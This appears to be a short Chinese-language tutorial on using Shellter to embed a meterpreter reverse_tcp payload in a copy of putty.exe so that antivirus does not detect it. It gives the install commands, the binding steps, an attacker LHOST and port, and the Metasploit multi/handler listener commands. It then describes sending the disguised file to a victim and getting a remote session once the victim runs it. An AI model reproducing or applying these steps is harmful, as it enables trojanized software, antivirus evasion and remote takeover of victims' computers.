使用Shelter繞過防毒軟體


Shellter 是一款主動的 shellcode 插入工具。它可以有效地重新編碼有效負載以繞過反病毒軟體。Shellter 以一種不被 AV 軟體檢測到的方式嵌入 32 位 Windows 應用程式和 shellcode。

安裝

您可以使用以下命令直接在 Kali 上安裝 Shellter:

  • apt-get install shellter
  • apt-get install wine32

如何繞過

  • 使用 wine 應用程式開啟 shelter,
  • 選擇操作模式為“a”。
  • 選擇一個可執行檔案並將其複製到 Shellter 資料夾。需要執行此操作以將 Shellter 與 .exe 檔案繫結。在我們的例子中,我們將 putty.exe 檔案複製到 Shellter 資料夾並將其與 shellter.exe 檔案繫結。
  • 選擇 PE 目標為 /root/Downloads/putty.exe
  • 繫結過程已開始,按 Enter 鍵繼續。您可能會看到 DisASM.dll 檔案已成功建立。透過 Y 啟用隱身模式。
  • 然後從列表中選擇有效負載為 meterpreter/reverse_tcp
  • 然後,設定 LHOST 192.168.1.109 [攻擊者 IP] LPORT 為 4444 並按 Enter。
  • 最後生成有效負載。將 PuTTY.exe 檔案傳送到受害者的機器
  • 啟動一個新的終端並輸入這些命令進行監聽。
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost <IP>
  • set lport <埠號>
  • exploit

成功!當受害者點選 putty.exe 檔案時,它看起來與原始 putty.exe 檔案相似,因此受害者會被誘騙,而我們會獲得一個 meterpreter 會話。此檔案對於任何防病毒軟體都是完全無法檢測到的。

更新於: 2020年9月23日

996 次瀏覽

開啟您的 職業生涯

透過完成課程獲得認證

開始學習
廣告